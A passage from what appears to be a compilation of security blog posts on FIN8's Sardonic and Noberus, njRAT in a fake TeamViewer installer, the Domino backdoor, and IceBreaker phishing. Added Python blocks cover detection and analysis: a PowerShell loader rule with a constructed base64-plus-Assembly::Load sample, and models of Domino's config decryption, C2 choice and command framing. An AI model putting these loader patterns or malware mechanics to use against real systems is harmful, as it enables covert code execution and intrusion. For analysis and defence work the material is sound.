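    "long_b64_literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}

def score_script_block(text: str) -> dict:
    """Return which indicators fired and a verdict.

    The verdict is 'loader' only when the script both decodes a blob and hands it
    to Assembly::Load: either alone is common in benign tooling.
    """
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    loader = hits["base64_decode"] and hits["assembly_load"]
    return {"hits": hits, "verdict": "loader" if loader else "benign"}

# constructed sample script blocks (not real FIN8 scripts)
SAMPLES = {
    "suspicious": (
        "$b = [Convert]::FromBase64String('" + "TVqQAAMAAAAEAAAA" * 20 + "');"
        "$a = [System.Reflection.Assembly]::Load($b);"
        "$a.GetType('Loader.Main').GetMethod('Run').Invoke($null, $null)"
    ),
    "benign_admin": (
        "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item"
    ),
    "benign_b64": (
        "$t = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SGVsbG8='));"
        "Write-Output $t"
    ),
}

def triage(samples: dict) -> dict:
    """Run the rule over a batch of script blocks and return name -> verdict."""
    return {name: score_script_block(body)["verdict"] for name, body in samples.items()}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name:14s} -> {verdict}")
```

The rule deliberately does not alert on `FromBase64String` alone; the design point is that the combination, plus a long base64 literal in the same block, is what separates an in-memory loader from everyday scripting.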


According to the researchers, the backdoor gives attackers interactive control over the infected system through processes such as cmd.exe. The analyzed sample supports up to 10 simultaneous sessions. To extend its capabilities, the backdoor accepts three plugin formats: PE DLL plugins, shellcode, and a second shellcode format with a different convention for passing arguments.

The Sardonic backdoor can execute multiple commands, including dropping files sent by the attacker, sending file contents back to the attacker, loading an attacker-provided DLL plugin, and running attacker-supplied shellcode.

FIN8 and Ransomware Operations

Although FIN8 was known for focusing on point-of-sale (POS) attacks, in recent years the group has used various ransomware families in its attacks, so ransomware operations are nothing new for it. What changed here is the final payload: Noberus. Noberus is better known as ALPHV/BlackCat, a well-established ransomware strain run by the ALPHV/BlackCat extortion gang, which researchers have linked to FIN7.


Noberus has several features that set it apart from rival ransomware. Each victim gets a unique onion domain for negotiations, and the infrastructure is architecturally separated from the affiliate program’s forums, so that even someone who obtains a full command-line shell on the panel cannot recover the server’s real IP address. Negotiation chats are encrypted and accessible only to the intended victim.

The ransomware offers two encryption algorithms, ChaCha20 and AES, and four encryption modes: Full, Fast, DotPattern and SmartPattern. Full mode leaves no plaintext behind and is therefore the most thorough, but also the slowest. SmartPattern encrypts a fixed amount of data at percentage steps through the file; by default it encrypts 10 megabytes at every 10 percent of the file, starting from the header. For attackers this is the best trade-off between speed and coverage.
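To see what the SmartPattern default actually means for a victim’s data, the following added example (not code from the original post and not Noberus itself) computes the byte ranges such an intermittent mode would encrypt for a given file size and the fraction of the file that ends up as ciphertext. The range arithmetic is an assumption built from the description above (10 MB at every 10 percent, starting at offset 0); the real implementation is not on the page. The interesting consequence it exposes is that with these defaults any file of 100 MB or less is encrypted in full, since the chunks overlap, while a 1 GB file loses under 10 percent of its bytes.

```python
# Added example (not from the original post or the ransomware): computes which byte
# ranges of a file an intermittent-encryption mode such as Noberus's SmartPattern
# would touch, using the defaults described above (10 MB at every 10 % of the file,
# starting at the header). The exact Noberus implementation is not public here;
# the range arithmetic below is an assumption used to illustrate the trade-off.

MB = 1024 * 1024

def smart_pattern_ranges(file_size: int, chunk: int = 10 * MB, step_pct: int = 10):
    """Return [(start, end)) byte ranges encrypted by a SmartPattern-style mode.

    A chunk of `chunk` bytes is encrypted at every `step_pct` percent of the file,
    beginning with the header (offset 0). Ranges are clamped to the file and
    merged when adjacent chunks overlap (small files end up fully encrypted).
    """
    if file_size <= 0:
        return []
    ranges = []
    for pct in range(0, 100, step_pct):
        start = file_size * pct // 100
        end = min(start + chunk, file_size)
        if ranges and start <= ranges[-1][1]:      # overlap with previous chunk
            ranges[-1] = (ranges[-1][0], max(ranges[-1][1], end))
        else:
            ranges.append((start, end))
    return ranges

def encrypted_fraction(file_size: int, **kw) -> float:
    """Fraction of the file's bytes that would be ciphertext."""
    if file_size <= 0:
        return 0.0
    total = sum(end - start for start, end in smart_pattern_ranges(file_size, **kw))
    return total / file_size

def full_mode_fraction(file_size: int) -> float:
    """Full mode is the trivial case: everything is encrypted."""
    return 1.0 if file_size > 0 else 0.0

if __name__ == "__main__":
    for size in (5 * MB, 50 * MB, 1024 * MB):
        print(f"{size // MB:5d} MB file: SmartPattern encrypts {encrypted_fraction(size):.1%}, "
              f"Full encrypts {full_mode_fraction(size):.0%}")
```

For recovery work this matters: on large files (databases, VM disks) most of the content survives intact, and the encrypted ranges are at predictable offsets.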

It’s just the beginning

FIN8 is constantly enhancing its abilities and its malware delivery infrastructure, and frequently refines its techniques to avoid detection. Its shift from point-of-sale attacks to ransomware shows a commitment to maximizing profit from each victim. Researchers have shared the tools and tactics this financially motivated threat actor uses, emphasizing its ongoing danger to organizations.

How to defend against organized cybercrime?

To protect against the ever-changing malware of FIN8, we suggest implementing a defense-in-depth strategy that involves using multiple layers of detection and protection tools and incorporating multi-factor authentication (MFA) and access controls.

Organizations can consider implementing one-time credentials for administrative work to prevent theft and misuse of admin credentials. It’s also a good idea to create usage profiles for admin tools, as attackers often use them to move undetected through a network.


Trojanized TeamViewer Installer Spreads njRAT
https://gridinsoft.com/blogs/trojanized-teamviewer-njrat/ (Thu, 20 Jul 2023 14:27:16 +0000)
Threat actors reportedly started using fake TeamViewer to distribute malware. Their particular favourite for the final payload is the infamous njRAT trojan – an old-timer of the scene. Through the tricky spreading scheme, hackers run a multi-stage attack.

njRAT Hides in Trojanized TeamViewer App

For some reason, people show a high level of trust towards download links handed to them on forums and other thematic communities, and this is where the majority of trojanized installers are spread. Cybercriminals, or users they pay to spread it, offer this installer as a “hacked full version” of the well-known remote access tool. Since it promises functions absent from the free version, and people are always eager for free stuff, they go for the crack. And, as often happens, using the crack ends with some really bad things.

Figure: files dropped during the installation. Both are run once it is over.

The installer I am talking about looks legitimate: neither its name nor its size raises suspicion. However, upon execution it drops two files: the legitimate TeamViewer installer and an item called “TeamViewer Starting.exe”. The latter is the payload, specifically njRAT, an infamous remote-access trojan from 2013. The forged installer then runs the legitimate TeamViewer setup, so the victim believes everything is fine.

What is njRAT?

njRAT, also known as Bladabindi, is an old-timer of the malware scene. It appeared almost a decade ago, and some analysts trace it back even further, to 2012. Such a long life is already a mark of success, and there are a couple of things going for it.

Being a classic remote access trojan, njRAT combines the functionality of a stealer with that of a backdoor. It grants its masters access to the infected system, which is already valuable: ordering the bot to send requests to a target server, using the machine as a proxy for malicious operations, rummaging through its files by hand, cybercriminals are ready to pay for all of that. And with an extensive botnet, its owner can simply lease it to other crooks and count the money.


That is only one side of njRAT’s dirty deeds. As I said, it can act as an infostealer, grabbing passwords and logging keystrokes. It particularly targets cryptocurrency wallets, both desktop ones and browser add-ons. This is a modern trend, and it would be shortsighted to ignore it: stealers that emerged around 2018 added this feature as they matured, and njRAT did so as well.

One more thing this malware is known for is its detection evasion. Aside from the heavy obfuscation that is a must-have in modern malware, it also attaches itself to critical system processes. This prevents users, and some antiviruses, from killing the process, and it disguises the malware well, since it appears among system processes rather than user ones in the Task Manager.

How to protect your system in such situations?

The one major thing that makes this spreading campaign possible is users’ trust in software recommended on third-party websites and in software cracks in general. If you do not download TeamViewer from warez sites and forums, you will not end up with njRAT running on your system; it is that simple. Still, several other tips will help you prevent infections regardless of their source.

Use a good anti-malware program. To be sure it protects you from the trickiest samples, choose one with a heuristic engine that detects threats by their behaviour, so obfuscation or mimicking system processes does not help the malware. GridinSoft Anti-Malware is one product that offers such a feature; consider trying it out.


Use licensed software. Trojanized TeamViewer is just one example of possible malware injection into the programs you get from unofficial sources. Paying for a licence is always less expensive and unpleasant than sorting out the consequences of spyware/backdoor activity. If there is no way to get the program from an official source (a common situation with abandonware) be sure to scan it with anti-malware software before launching.

Keep an eye on cybersecurity news. This is cherry-on-top advice, that does not change much, but will surely help you to know where the traps are. Malicious Google ads, fake installers, email spam campaigns that convincingly mimic legit mailings – awareness sometimes can save you better than any reactive measures.

Domino Backdoor is Led by FIN7 and Conti Actors
https://gridinsoft.com/blogs/domino-backdoor/ (Sat, 15 Apr 2023 22:13:57 +0000)
A new backdoor called Domino popped up at the beginning of 2023. Since February, this new malware family has been used in attacks on corporations, with the Project Nemesis stealer as the final payload. Analysts say the backdoor is developed and operated by ex-TrickBot/Conti actors together with hackers related to the FIN7 group.

Who are Conti and FIN7?

First, let’s explain why the presence of actors from FIN7 and from the defunct Conti gang is so noteworthy. FIN7 is a cybercrime gang that likely operates from Russia and Ukraine. It is also known as Carbanak (after the backdoor it uses) and ITG14, and has been linked to ALPHV/BlackCat. The group is notorious for collaborations with widely known threat actors such as the Ryuk and REvil ransomware operations, and for the ALPHV ransomware attributed to it, which is still active and carried out a couple of noteworthy attacks over the past year.

Figure: ALPHV onion site. The gang uses it to publish data leaked from victims who refused to pay the ransom.

Conti is a similar story and a different one at the same time. The group built its image around the eponymous ransomware. Like FIN7, it consisted of actors from ex-USSR countries; however, the start of the war in February 2022 led to a quarrel among the group’s top management and to the publication of its source code, which eventually led to the group’s dissolution. Before these events, Conti was a prolific ransomware gang with a major share of the market.

A collaboration between the two is not surprising. Nature abhors a vacuum, so after the gang’s breakup its members promptly joined other groups or started new ones. Collaborating with another gang on brand-new malware, however, is a rather outstanding case. It may mark the start of a new threat actor on the scene, or just a powerful boost to the FIN7 gang.

Domino Backdoor Description

Domino is a classic example of a modern backdoor capable of malware delivery. It has been spotted alongside a separate dropper, coined Domino Loader: the backdoor provides remote access to the targeted system, while the loader handles malware deployment. This duo has been used in a fairly unique multi-stage campaign.


Dave Loader is a classic dropper malware example – the one which serves only to deliver other malware. Its presence in this scheme, however, gives an interesting clue about the possible relations between Domino and Conti ransomware gang. The infection proceeds with the delivery of Domino backdoor and, in a quick succession, its dropper module. Then, at the final stage, Domino drops a Project Nemesis stealer. The latter aims generally at credentials from social networks, VPN clients and cryptocurrency services.

Why, Exactly, a Collaboration?

Two things point to Domino being a collaboration rather than a stand-alone development: the use of Dave Loader for delivery, and code shared with FIN7’s own Lizar malware. Dave is an internal Conti tool used exclusively in its attacks; unlike the Conti ransomware code it never leaked, so a third party is unlikely to have it. Lizar Loader, a.k.a. Tirion/DiceLoader, is an auxiliary malware used by FIN7, and Domino shares major parts of its code with this loader, including the bot ID generation and data package encryption mechanisms. Moreover, the IP range hosting Domino’s command servers is very close to the one FIN7 uses for its C2s; both ranges belong to the MivoCloud hosting provider.

Domino Backdoor & Loader Analysis

Analysts from IBM Security Intelligence already got their hands on Domino samples, both backdoor and dropper. First things first – so let’s start from a backdoor.

Domino Backdoor

It arrives on the infected system as a 64-bit C++ DLL, a form that makes stealthy execution easier. The droppers that deliver Domino generally run it via shellcode embedded in the payload retrieved from the command server. Once executed, Domino hashes system data to generate a bot ID: primarily the username and the system name, with the malware’s own process ID appended. The final form looks like a648628c13d928dc-3250.

After hashing, Domino decrypts the rest of its code. It carries an XOR-encrypted blob in a data section of its binary, with the 16-bit XOR key placed right before that section. The decrypted part contains not only further execution logic but also the C2 communication data.

Figure: code responsible for command handling.

C2 Communications

To secure the data transfer, Domino generates a 32-byte (256-bit) AES key and encrypts it with an embedded RSA public key; this RSA-wrapped key is sent only in the initial connection. The malware then collects information about the system. For subsequent C2 connections it uses that AES-256-CBC key, which was included in the initial package, to encrypt each data package.

It is also interesting how Domino picks its primary C2 address. By design there are only two C2 addresses in the configuration section. If the infected system is joined to a Windows domain, the malware uses the second address as primary; on a stand-alone computer it chooses the first.
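The three startup steps just described (bot ID from hashed host data plus PID, a 16-bit XOR key sitting right before the encrypted data section, and the domain-joined rule for picking the primary C2) are easy to model, and doing so is how an analyst would write a config extractor for the sample. The block below is an added example, not code from the original post or from IBM’s analysis, and not Domino itself. Two assumptions are labelled in the code: the 64-bit hash behind the bot ID (the post only says the fields are hashed, so SHA-256 truncated to 8 bytes stands in for it), and the layout of the constructed configuration blob with its two placeholder C2 addresses from the documentation range.

```python
import hashlib
import os
import socket
import struct

# Added example (not the original post's or IBM's code, and not Domino itself):
# a Python model of the three startup steps described above. The 64-bit hash used
# for the bot ID is an assumption (the post only says the fields are hashed); the
# XOR layer follows the post's description of a 16-bit key stored right before the
# encrypted data section.

def bot_id(username: str, hostname: str, pid: int) -> str:
    """Hash username + hostname to 16 hex chars and append the PID (e.g. 'a648628c13d928dc-3250').

    ASSUMPTION: the first 8 bytes of SHA-256 stand in for the malware's real hash.
    """
    digest = hashlib.sha256(f"{username}|{hostname}".encode()).digest()[:8]
    return f"{digest.hex()}-{pid}"

def xor16(data: bytes, key: int) -> bytes:
    """Apply a repeating 16-bit little-endian XOR key; symmetric, so it encrypts too."""
    kb = struct.pack("<H", key)
    return bytes(b ^ kb[i % 2] for i, b in enumerate(data))

def decrypt_section(section: bytes) -> bytes:
    """Decrypt a data section laid out as: 2-byte key || XOR-encrypted payload."""
    if len(section) < 2:
        raise ValueError("section too short to hold a key")
    (key,) = struct.unpack("<H", section[:2])
    return xor16(section[2:], key)

def choose_c2(c2_list, domain_joined: bool) -> str:
    """Domain-joined hosts use the second configured C2, stand-alone hosts the first."""
    if len(c2_list) != 2:
        raise ValueError("Domino carries exactly two C2 addresses")
    return c2_list[1] if domain_joined else c2_list[0]

# constructed config (ASSUMED layout): two placeholder C2s from the documentation
# range, XOR-encrypted under a demo key with that key prepended, as described above
CONFIG_PLAINTEXT = b"c2=192.0.2.10;c2=192.0.2.20;mutex=demo"
SECTION = struct.pack("<H", 0xBEEF) + xor16(CONFIG_PLAINTEXT, 0xBEEF)

def parse_c2s(config: bytes):
    """Pull the c2= fields out of the decrypted configuration, in order."""
    return [f.split("=", 1)[1] for f in config.decode().split(";") if f.startswith("c2=")]

if __name__ == "__main__":
    print("bot id:", bot_id(os.environ.get("USER", "user"), socket.gethostname(), os.getpid()))
    cfg = decrypt_section(SECTION)
    c2s = parse_c2s(cfg)
    print("config:", cfg.decode())
    print("primary C2 (domain-joined):", choose_c2(c2s, domain_joined=True))
    print("primary C2 (stand-alone):", choose_c2(c2s, domain_joined=False))
```

The practical use of such a model is the ordering of the two addresses: because a domain-joined host contacts the second one, a sandbox that is not domain-joined will only ever show the first, so both should be blocked.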

To guide the malware, C2 sends it a set of commands and a payload. Same as data that goes from the client, they are encrypted. Commands instruct not only about the action, but also about the preferred way to run the payload. The set of commands is like the following:

Command    Explanation
0x1        Copy the payload into the allocated memory. The allocation instructions come with the 0x5/0x6 commands.
0x3        Quit execution.
0x4        Save the retrieved payload to the %Temp% folder. The file name is generated with GetTempFileNameA, and the file is then launched with CreateProcessA.
0x5, 0x6   Instruct the malware to allocate memory for the payload in a certain process.
0x7        Enumerate the processes and send the list to the server. Usually precedes 0x5/0x6, as it supplies the C2 with candidate processes for injection.

Domino Loader

Domino Loader resembles the Domino Backdoor in many ways, hence the naming. It uses the same C2 request encryption, but gathers far less data about the system; its capabilities centre on retrieving and running a payload DLL, using the well-known ReflectiveDLLInjection technique. That is not the loader’s only mode of operation, however: its behaviour changes according to a command that arrives from the C2 together with the payload, which presumably depends on the form the payload takes.

The command convention is much the same as in the backdoor: a single byte that precedes the payload indicates what the malware should do. In addition, the payload is followed by a value that tells the loader how to load it. If the value is greater than 0, the loader allocates memory within its own process and runs the DLL payload at the offset equal to that value; this is the path that uses the aforementioned ReflectiveDLLInjection technique.

A value of 0 means the payload is run as a .NET assembly. The loader calls VirtualAlloc for the memory, sets it to PAGE_EXECUTE_READWRITE, and uses Assembly.Load to get the payload running.

A value of -1 triggers the PE loading procedure. The loader first allocates memory in its current process, as in the DLL case, but then copies the headers and sections into the new area, resolves the PE file’s imports, and finally runs it, applying the offsets present in the payload’s PE sections.
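The framing described for both components (the backdoor’s one-byte command tag from the table above, and the loader’s trailing value that selects reflective DLL, .NET assembly or PE loading) is exactly what an analyst models first when writing a decoder for captured tasks. The block below is an added example, not code from the original post or from IBM’s report, and not Domino code. Assumptions labelled in the code: the command tag is one byte (the post says “single-byte blob”), the trailing load-mode value is a 4-byte signed little-endian integer (the post gives only its sign semantics), and the frames are already decrypted, so the AES layer is out of scope. The sample frames are constructed and carry fake payload bytes.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Added example (not from the original post or IBM's analysis, and not Domino code):
# a parser for the task framing described above, written the way an analyst would
# model it while reversing the sample. ASSUMPTIONS: the leading command tag is one
# byte (the post says "single-byte blob"), the trailing load-mode value is a 4-byte
# signed little-endian integer (the post gives only its sign semantics), and the
# tasks are already decrypted (the AES layer is out of scope here).

COMMANDS = {
    0x1: "copy payload into memory allocated by 0x5/0x6",
    0x3: "quit",
    0x4: "write payload to %Temp% and execute it",
    0x5: "allocate memory in target process (variant A)",
    0x6: "allocate memory in target process (variant B)",
    0x7: "enumerate processes and report them",
}

PAYLOAD_COMMANDS = {0x1, 0x4}   # commands that must carry a payload

@dataclass
class Task:
    command: int
    payload: bytes
    load_mode: Optional[int]    # only meaningful for Domino Loader frames

def load_method(mode: int) -> str:
    """Map the trailing value to the loader behaviour described in the post."""
    if mode > 0:
        return f"reflective DLL: run payload at offset {mode:#x}"
    if mode == 0:
        return ".NET assembly: VirtualAlloc(PAGE_EXECUTE_READWRITE) + Assembly.Load"
    if mode == -1:
        return "PE loader: map headers/sections, resolve imports, call entry point"
    raise ValueError(f"unknown load mode {mode}")

def parse_task(frame: bytes, loader: bool = False) -> Task:
    """Split a decrypted frame into command tag, payload and (loader only) mode value."""
    if not frame:
        raise ValueError("empty frame")
    command, body = frame[0], frame[1:]
    if command not in COMMANDS:
        raise ValueError(f"unknown command {command:#x}")
    mode = None
    if loader:
        if len(body) < 4:
            raise ValueError("loader frame lacks trailing mode value")
        (mode,) = struct.unpack("<i", body[-4:])
        body = body[:-4]
    if command in PAYLOAD_COMMANDS and not body:
        raise ValueError(f"command {command:#x} requires a payload")
    return Task(command, body, mode)

def describe(task: Task) -> str:
    """Human-readable summary of what the sample would do with this task."""
    text = COMMANDS[task.command]
    if task.load_mode is not None:
        text += " via " + load_method(task.load_mode)
    return text

# constructed frames (fake payload bytes, not real shellcode or binaries)
BACKDOOR_ENUM = bytes([0x7])
LOADER_DLL = bytes([0x1]) + b"MZ...fake dll..." + struct.pack("<i", 0x1234)
LOADER_PE = bytes([0x1]) + b"MZ...fake exe..." + struct.pack("<i", -1)

if __name__ == "__main__":
    for frame, is_loader in ((BACKDOOR_ENUM, False), (LOADER_DLL, True), (LOADER_PE, True)):
        print(describe(parse_task(frame, loader=is_loader)))
```

Rejecting unknown tags and payload-less 0x1/0x4 frames up front is deliberate: in a decoder run over real captures it separates genuine tasks from keep-alives or garbage that happen to decrypt.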

Protection against Domino Backdoor/Domino Loader

This malware is still rare, so it is hard to judge how best to counter it. Countermeasures are definitely needed, though, as it promises to be quite dangerous. The first and most important input for such advice, the spreading methods, is still unclear; it may become clearer as Domino gains popularity. For now, only general measures offer meaningful protection.

Use a security solution that features a zero-trust protection policy. Only having no trusted programs at all you can be sure that your security tool will not miss a new cunning malware that hides behind a benign program. Zero-trust has its downsides, but they’re much less critical than a paralysed workflow after a ransomware attack.

Improve your network security. This is Domino-specific advice, as this malware features a pretty limited list of only two C2 servers. It may be changed in future, but currently it is not a big deal to block them. This, however, will be much easier to accomplish by having a Network Detection and Response solution. It automatically weeds out potentially malicious requests, and also offers a lot of analytics information. Stopping malware from contacting the C2 makes it useless, as it cannot deliver payloads and do other unpleasant things.

IceBreaker Backdoor Emerged, Exploiting New Phishing Way
https://gridinsoft.com/blogs/icebreaker-backdoor-new-phishing-way/ (Mon, 06 Feb 2023 12:46:52 +0000)
A new player has appeared in cyberspace, with surprisingly new methods. A previously unknown group attacked gambling and online gaming companies using a yet unknown backdoor, named IceBreaker by researchers.

IceBreaker Backdoor exploits new phishing way

The method of compromising is based on the fact that tech support workers are tricked into opening malicious screenshots that the attacker sends under the guise of a problem that the user is experiencing. The first attacks were recorded in September 2022 by incident response specialists from Security Joes. They believe that the IceBreaker backdoor is the work of a new advanced attacker using a new and very specific social engineering tactic.

Analyzing the technique in perspective can give a clearer picture of who they are. At any rate, by analyzing data from the September incident, the researchers were able to respond to three other attacks before the hackers could compromise their targets. The only public evidence of the existence of the IceBreaker attacker is an October tweet from MalwareHunterTeam.

To deliver the backdoor, the attacker contacts the target company’s helpdesk, posing as a user having trouble logging in or registering with the online service. The hackers convince the support person to download an image that supposedly describes the problem better than they can explain it. Experts say the image is usually hosted on a fake image hosting service, with the link disguised to make the victim believe it comes from Dropbox storage.


Links delivered this way lead to a ZIP archive containing a malicious LNK file, which downloads the IceBreaker backdoor. Other tech-support attacks used a Visual Basic script that downloads the Houdini RAT, a malware in use since at least 2013, whose remote access capabilities the hackers then use to deploy the final payload, IceBreaker. The experts note that the downloaded malware is a highly sophisticated compiled JavaScript file. It can enumerate running processes, steal passwords and cookies, open a reverse tunnel through a proxy, and receive and run scripts sent from the control server.

The malicious LNK is the first-stage payload that delivers IceBreaker, and the VBS file serves as a backup in case the helpdesk operator cannot run the shortcut. The country of origin of the new actor has not been identified, but researchers say the conversations between the attacker and support staff show that the actor is not a native English speaker: they deliberately ask to switch the conversation to Spanish, and have been observed using other languages as well. The gaming industry, and not only it, should stay alert, as the hackers combine a very effective attack vector with a new malware arsenal.
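The weak point of this lure is that a “screenshot” archive should contain nothing but images, yet the chain above depends on the ZIP carrying a Windows shortcut (and a VBS fallback). The check below is an added example, not code from the original post or from Security Joes’ research: it is the kind of gate a helpdesk mail or chat intake could apply to inbound archives, identifying entries by content rather than file name, since the attacker controls the name and can pad it to hide a .lnk extension. The LNK signature used is the ShellLinkHeader prefix (HeaderSize 0x4C followed by the LinkCLSID 00021401-0000-0000-C000-000000000046); the archive is constructed in memory for the example.

```python
import io
import zipfile

# Added example (not from the original post or Security Joes' research): a check a
# helpdesk mail/chat gateway could run on an inbound "screenshot" archive, flagging
# the delivery chain described above, a ZIP that carries a Windows shortcut (LNK)
# or a script instead of an image. Entries are identified by content, not name,
# since an attacker can call the file "screenshot.png.lnk" or hide the extension.
# The archive below is constructed in memory for the example.

# ShellLinkHeader: HeaderSize 0x0000004C + LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")

def classify_entry(name: str, head: bytes) -> str:
    """Classify one archive member from its first bytes (and, for scripts, its extension)."""
    if head.startswith(LNK_MAGIC):
        return "lnk"
    if name.lower().endswith(SCRIPT_EXT):
        return "script"
    if head.startswith(PNG_MAGIC) or head.startswith(JPEG_MAGIC):
        return "image"
    return "other"

def inspect_zip(data: bytes) -> dict:
    """Return {entry_name: class} for every file in the archive, reading only the first 64 bytes."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                result[info.filename] = classify_entry(info.filename, fh.read(64))
    return result

def is_suspicious(data: bytes) -> bool:
    """A 'screenshot' archive should contain images only."""
    return any(kind in ("lnk", "script") for kind in inspect_zip(data).values())

def build_sample_zip(include_lure: bool = True) -> bytes:
    """Constructed archive: a decoy PNG, plus (optionally) a shortcut padded to look like
    a second image and a VBS fallback, mirroring the chain described in the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("error1.png", PNG_MAGIC + b"\x00" * 32)
        if include_lure:
            zf.writestr("error2.png                    .lnk", LNK_MAGIC + b"\x00" * 48)
            zf.writestr("readme.vbs", b"WScript.Echo 1")
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample_zip()
    for name, kind in inspect_zip(sample).items():
        print(f"{kind:6s} {name!r}")
    print("suspicious:", is_suspicious(sample))
```

Reading only the first 64 bytes of each member keeps the check cheap enough to run on every attachment; the same logic belongs on the endpoint side as a mail-filter rule that strips or quarantines archives containing shortcut files.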

What’s next?

Malware delivery methods evolve constantly to keep up with their environment. Microsoft’s recent policy change on executing macros in files downloaded from the Internet rendered that delivery method almost useless. Moreover, after almost four years of email spam dominating as a delivery method, companies began implementing proactive countermeasures. Seeking new ways to spread was therefore an obvious step.

A tactic that involves sending a message with a malicious attachment to tech support was to be expected; any media content draws the attention of support staff in their drab and dreary workflow. Fortunately, this new way of spreading malware is not yet widespread, though hackers have evidently found a way around Microsoft’s restrictions. Nonetheless, ignoring that messages to support may carry dangers other than abuse or criticism is reckless.

